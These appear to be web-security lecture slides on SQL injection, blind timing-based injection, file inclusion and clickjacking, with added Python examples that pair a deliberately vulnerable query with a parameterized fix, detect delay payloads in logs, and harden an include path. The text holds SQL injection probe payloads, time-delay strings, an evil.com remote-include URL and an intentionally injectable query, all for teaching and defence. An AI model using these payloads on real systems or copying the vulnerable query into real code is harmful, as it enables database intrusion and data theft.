11
“Injection flaws occur when an application sends untrusted data to an interpreter.” --- OWASP
https://www.owasp.org/index.php/Top_10_2010-A4-Insecure_Direct_Object_References
Like buffer overflow and format string vulnerabilities, injection flaws result from the possibility of interpreting data as code.

33
Probing Number of Columns
ORDER BY can be added to an SQL query to order results by a queried column.

    select first_name,last_name from users where user_id = 1 ORDER BY 1

    $id = $_GET['id'];
    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
    $result = mysql_query($getid) or die(' '. mysql_error(). ' ' );

34
Probing Number of Columns
ORDER BY can be added to an SQL query to order results by a column.

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; ...

    select first_name,last_name from users where user_id = '1' ORDER BY 1;#   ✓
    select first_name,last_name from users where user_id = '1' ORDER BY 3;#   ✗

=> 1 or 2 columns

35
Probing Number of Columns
ORDER BY can be added to an SQL query to order results by a column.
What would be a good algorithm using this fact to determine the exact number of columns?
Binary search! ✓ (rather than brute force)
Assuming an upper bound of 32 columns => ~5 queries

36
Probing Column Names
A query with an incorrect column name will give an error.

    $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; ...

    select first_name,last_name from users where user_id = '1' or first_name IS NULL;#   ✓
    select first_name,last_name from users where user_id = '1' or firstname IS NULL;#    ✗
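The lookup on slides 33–36, rebuilt as an added example (not code from the lecture or from DVWA) on an in-memory SQLite table so that the string-concatenation bug and its parameterized fix can be run side by side with the probes the slides describe. The table contents are constructed, and the slides' MySQL comment marker `#` is written as SQLite's `--`; everything else mirrors the PHP on the slides.

```python
"""Added example (not from the lecture slides): the DVWA-style lookup rebuilt
on SQLite so the concatenation bug and its parameterized fix run side by side.
Assumptions (not on the page): the users table below is constructed, and the
slides' MySQL comment marker '#' is written as SQLite's '--' here."""
import sqlite3
from typing import Callable, List, Tuple

# Constructed sample data standing in for the slides' users table.
SAMPLE_ROWS = [
    (1, "admin", "admin"),
    (2, "Gordon", "Brown"),
    (3, "Hack", "Me"),
]


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_ROWS)
    return conn


def lookup_unsafe(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Mirrors the slides' $getid = "... WHERE user_id = '$id'": the request
    parameter is spliced into the SQL text, so the database parses it as code."""
    query = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(query).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> List[Tuple[str, str]]:
    """Hardened form: the parameter travels separately from the SQL text, so
    whatever it contains is compared as a literal value and never parsed."""
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(query, (user_id,)).fetchall()


def probe_outcome(lookup: Callable, conn: sqlite3.Connection, user_id: str) -> str:
    """Summarize what a caller observes: a row count or an SQL error. That
    difference is the signal the ORDER BY / column-name probes rely on."""
    try:
        rows = lookup(conn, user_id)
    except sqlite3.OperationalError as exc:
        return f"error: {exc}"
    return f"{len(rows)} row(s)"


if __name__ == "__main__":
    conn = make_db()
    payloads = ["1", "1' ORDER BY 1 --", "1' ORDER BY 3 --",
                "1' OR first_name IS NULL --", "1' OR firstname IS NULL --"]
    for payload in payloads:
        print(f"{payload!r:32} unsafe -> {probe_outcome(lookup_unsafe, conn, payload):48} "
              f"safe -> {probe_outcome(lookup_safe, conn, payload)}")
```

With the unsafe lookup, `ORDER BY 3` and the misspelled column name produce database errors while the well-formed probes return rows, which is exactly the ✓/✗ distinction the slides exploit. With the parameterized lookup every probe simply matches no user, because the whole string is compared against `user_id` as data.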

40
Blind SQL Injection
Sometimes the results of SQL queries are not sent back to the user.

    /user.php?id=5
    SELECT FROM users where uid=5
    “jburket”

41
Blind SQL Injection
Definition: A blind SQL injection attack is an attack against a server that responds with a generic error page or even nothing at all.
Approach: ask a series of True/False questions, exploiting side-channels.

42
Blind SQL Injection

    if ASCII(SUBSTRING(username,1,1)) = 64 waitfor delay '0:0:5'

If the first letter of the username is A (65), there will be a 5 second delay.
Actual MySQL syntax!

43
Blind SQL Injection

    if ASCII(SUBSTRING(username,1,1)) = 65 waitfor delay '0:0:5'

By timing responses, the attacker learns about the database one bit at a time.
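The defender's view of the timing probe on slides 42–43, as an added example that is not part of the lecture: a detection pass over web-server access logs that flags requests carrying a delay primitive and, when the measured response time matches the requested delay, reports that the database actually executed it. The log lines are constructed, with a trailing response-time field in the style of nginx's `$request_time`. One caveat the slides do not state: `WAITFOR DELAY` is Microsoft SQL Server (T-SQL) syntax; MySQL's equivalent is `SLEEP()`, so the rule matches both families.

```python
"""Added example (not from the lecture slides): detect time-based blind SQL
injection probes in access logs. SAMPLE_LOG is constructed; the last field is
the response time in seconds (nginx $request_time style, an assumption)."""
import re
from typing import Dict, List, Optional, Tuple
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
10.0.0.5 - - [12/Mar/2015:10:01:02 +0000] "GET /user.php?id=5 HTTP/1.1" 200 512 0.031
10.0.0.5 - - [12/Mar/2015:10:01:09 +0000] "GET /user.php?id=5%27%3B+if+ASCII(SUBSTRING(username,1,1))%3D64+waitfor+delay+%270:0:5%27-- HTTP/1.1" 200 512 0.034
10.0.0.5 - - [12/Mar/2015:10:01:15 +0000] "GET /user.php?id=5%27%3B+if+ASCII(SUBSTRING(username,1,1))%3D65+waitfor+delay+%270:0:5%27-- HTTP/1.1" 200 512 5.041
10.0.0.9 - - [12/Mar/2015:10:02:00 +0000] "GET /user.php?id=7+AND+SLEEP(5) HTTP/1.1" 200 498 5.020
10.0.0.7 - - [12/Mar/2015:10:02:30 +0000] "GET /search.php?q=sleeping+bag HTTP/1.1" 200 2048 0.120
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+) (?P<secs>[\d.]+)$'
)

# Delay primitives of the common engines: T-SQL (the slides), MySQL, PostgreSQL.
DELAY_RE = re.compile(r"waitfor\s+delay|\bsleep\s*\(|\bbenchmark\s*\(|\bpg_sleep\s*\(", re.I)

# A requested 5 s delay shows up as a roughly 5 s response; allow some slack.
DELAY_FIRED_SECS = 4.5


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one access-log line; URL-decode the request so encoded payloads match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    entry: Dict[str, object] = m.groupdict()
    entry["secs"] = float(m.group("secs"))
    entry["decoded"] = unquote_plus(m.group("url"))
    return entry


def classify(entry: Dict[str, object]) -> Optional[str]:
    """'probe': a delay primitive was sent. 'confirmed': the response also took
    about as long as the requested delay, i.e. the database ran the attacker's
    SQL. None: nothing suspicious."""
    if not DELAY_RE.search(str(entry["decoded"])):
        return None
    return "confirmed" if float(entry["secs"]) >= DELAY_FIRED_SECS else "probe"


def scan(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client ip, verdict, decoded url) for every suspicious line."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry is None:
            continue
        verdict = classify(entry)
        if verdict:
            hits.append((str(entry["ip"]), verdict, str(entry["decoded"])))
    return hits


if __name__ == "__main__":
    for ip, verdict, url in scan(SAMPLE_LOG):
        print(f"{ip:10} {verdict:10} {url}")
```

The "confirmed" verdict is the one worth paging on: a probe whose response time tracks the requested delay shows the injection point is live, whereas the benign `sleeping bag` search never matches because the rule requires the function-call form. In production the threshold should be derived from the endpoint's normal latency distribution rather than a fixed constant.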

90
Remote File Inclusion
Example from wikipedia.org/File_inclusion_vulnerability, colors.php: … …

    /colors.php?COLOR=red                  will include contents of red.php
    /colors.php?COLOR=blue                 will include contents of blue.php
    /colors.php?COLOR=/hidden/dangerous    will include /hidden/dangerous.php   (Local File Inclusion)
    /colors.php?COLOR=http://evil.com/bad  will include

Perfect for executing an XSS attack
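A hardened version of the colors.php lookup, as an added example that is not code from the slides or from Wikipedia: the PHP include is modelled in Python so the two defences can be exercised here. The directory, file names and the "lowercase word" allowlist rule are constructed for the demonstration.

```python
"""Added example (not from the slides): harden the colors.php style lookup.
The include directory, its files and the allowlist rule are constructed."""
import re
import tempfile
from pathlib import Path

# Allowlist on the parameter's shape: a short lowercase word, nothing else
# (constructed rule). This alone rejects '/hidden/dangerous' and URLs.
NAME_RE = re.compile(r"^[a-z]{1,32}$")


def resolve_include(base_dir: Path, color: str) -> Path:
    """Map the COLOR request parameter to a file strictly inside base_dir.

    Two independent checks: the allowlist on the raw parameter, and a
    containment check on the resolved path that catches anything the first
    rule might later be loosened to admit (traversal, symlinks)."""
    if not NAME_RE.match(color):
        raise ValueError(f"rejected COLOR parameter: {color!r}")
    base = base_dir.resolve()
    target = (base / f"{color}.php").resolve()
    if target.parent != base:
        raise ValueError(f"path escapes include directory: {target}")
    if not target.is_file():
        raise FileNotFoundError(f"no such color file: {target.name}")
    return target


def demo_dir() -> Path:
    """Create a throwaway include directory holding red.php and blue.php."""
    d = Path(tempfile.mkdtemp(prefix="colors_"))
    for name in ("red", "blue"):
        (d / f"{name}.php").write_text(f"<?php echo '{name}'; ?>\n")
    return d


def outcome(base_dir: Path, color: str) -> str:
    """Human-readable verdict for one request parameter."""
    try:
        return "include " + resolve_include(base_dir, color).name
    except (ValueError, FileNotFoundError) as exc:
        return f"reject ({exc.__class__.__name__})"


if __name__ == "__main__":
    d = demo_dir()
    for c in ["red", "blue", "/hidden/dangerous", "http://evil.com/bad",
              "../../etc/passwd", "green"]:
        print(f"{c:22} -> {outcome(d, c)}")
```

The same shape works in PHP: validate the parameter against an allowlist, build the path from a fixed directory, and never pass a raw request value to `include`; disabling `allow_url_include` removes the remote case entirely but does nothing for the local one, which is why the path check stays.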

94
CSS History Probing
Image from evil.com:
    Client has visited Google, Facebook and the Facebook Group
    Client has NOT visited Twitter or Facebook Group
Attacker uses JavaScript + CSS to check which links are visited.

95
How does the “Like” button work?
The Like button knows about your Facebook session!
It appears in a “mashup” with content from other domains.

96
How does the “Like” button work?
Like button requirements:
    Needs to access the cookie for domain facebook.com
    Can be deployed on domains other than facebook.com
    Other scripts on the page should not be able to click the Like button
We need to isolate the Like button from the rest of the page.

97
IFrames
    Parent page
    Embedded page
Any page can be embedded.

98
IFrames
    Pages share the same domain
    Pages do not share the same domain
The same-origin policy states that the DOM from one domain should not be able to access the DOM from a different domain.

99
How does the “Like” button work?
The same-origin policy prevents the host from clicking the button and from checking if it’s clicked.

100
The same-origin policy prevents malicious sites from clicking their own “Like” button.
What if the site can trick you into clicking it yourself?

106
Using Frames for Evil
If pages with sensitive buttons can be put in an IFrame, then it may be possible to perform a Clickjacking attack.

107
Framebusting
Framebusting is a technique where a page stops functioning when included in a frame.

    if(top != self) top.location.replace(self.location);

If the page with this script is embedded in a frame, then it will escape out of the frame and replace the embedding page.

111
X-Frame-Options Header
    DENY: The page cannot be embedded in a frame
    SAMEORIGIN: The page can only be framed on a page with the same domain
    ALLOW-FROM origin: The page can only be framed on a page with a specific other domain
Can limit flexibility and might not work on older browsers.
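The decision a browser makes from the header values listed above, written out as an added example that is not part of the lecture. It goes one step beyond the slide by also handling the CSP `frame-ancestors` directive, which is the current replacement for X-Frame-Options and takes precedence when both are present; `ALLOW-FROM` was only ever implemented by a minority of browsers and has since been removed, so `frame-ancestors` is what a practitioner would deploy today. The origins and headers used in the demo are constructed, and only `scheme://host` sources are recognized in the CSP source list (a simplification).

```python
"""Added example (not from the slides): evaluate whether a page may be framed
by a given embedder, from its X-Frame-Options and CSP frame-ancestors headers.
Origins below are constructed; CSP host-sources without a scheme are not
handled (simplification)."""
from typing import Dict
from urllib.parse import urlsplit


def origin_of(url: str) -> str:
    """scheme://host[:port], lowercased, which is what SAMEORIGIN compares."""
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}".lower()


def framing_allowed(headers: Dict[str, str], page_url: str, embedder_url: str) -> bool:
    """True if page_url may be shown inside a frame on embedder_url.

    Header names are matched case-insensitively. No header at all means
    anyone may frame the page, which is the default clickjacking relies on."""
    h = {k.lower(): v for k, v in headers.items()}
    page, embedder = origin_of(page_url), origin_of(embedder_url)

    # CSP frame-ancestors wins over X-Frame-Options when it is present.
    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        name, _, value = directive.strip().partition(" ")
        if name.lower() != "frame-ancestors":
            continue
        sources = value.split()
        if "'none'" in sources:
            return False
        for src in sources:
            if src == "*":
                return True
            if src == "'self'" and embedder == page:
                return True
            if src.startswith(("http://", "https://")) and origin_of(src) == embedder:
                return True
        return False  # directive present, embedder not listed

    xfo = h.get("x-frame-options", "").strip()
    if not xfo:
        return True
    value, _, arg = xfo.partition(" ")
    value = value.upper()
    if value == "DENY":
        return False
    if value == "SAMEORIGIN":
        return embedder == page
    if value == "ALLOW-FROM":
        return origin_of(arg.strip()) == embedder
    return True  # unrecognized value: treated here as no restriction


if __name__ == "__main__":
    like = "https://facebook.com/plugins/like"
    cases = [
        ({}, "https://evil.example"),
        ({"X-Frame-Options": "DENY"}, "https://facebook.com"),
        ({"X-Frame-Options": "SAMEORIGIN"}, "https://evil.example"),
        ({"Content-Security-Policy": "frame-ancestors 'self' https://partner.example"},
         "https://partner.example/page"),
    ]
    for hdrs, embedder in cases:
        print(f"{str(hdrs):70} from {embedder:30} -> {framing_allowed(hdrs, like, embedder)}")
```

Compared with the framebusting script on the previous slide, the header approach needs no JavaScript to run in the framed page, so it cannot be neutralized by anything the embedding page does to the script environment; the cost is the reduced flexibility the slide notes, which `frame-ancestors` largely recovers by accepting a list of origins.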

114
Disclaimer: The exact details of the following protocols may not be 100% correct (i.e. Facebook might use a slightly different implementation than presented here). Our goal is to get a feel for how these systems work. This section won’t be on the test. Something similar may come up in the homework, however.